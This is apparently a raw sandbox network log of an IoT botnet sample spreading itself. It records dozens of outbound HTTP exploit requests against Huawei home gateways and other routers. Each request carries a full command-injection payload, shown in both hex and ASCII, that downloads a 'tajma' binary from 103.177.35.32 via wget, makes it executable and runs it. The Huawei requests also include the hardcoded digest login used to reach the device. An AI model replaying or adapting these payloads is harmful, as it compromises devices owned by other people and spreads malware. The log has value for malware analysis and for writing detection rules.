                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2946192.168.2.2340048197.17.8.5837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.665345907 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2947192.168.2.235436482.219.149.5737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.665349007 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2948192.168.2.2340716197.95.58.3537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.665384054 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2949192.168.2.2340428197.48.55.1937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.665477991 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2950192.168.2.2357584208.184.65.24337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.665496111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2951192.168.2.2347082197.176.223.22737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.665508986 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2952192.168.2.2344840157.120.118.18237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.665527105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2953192.168.2.2349876157.153.46.2237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.665537119 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2954192.168.2.2349376197.94.121.6737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.665546894 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2955192.168.2.233760414.233.92.918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474663973 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2956192.168.2.2360118180.186.227.678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.474693060 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
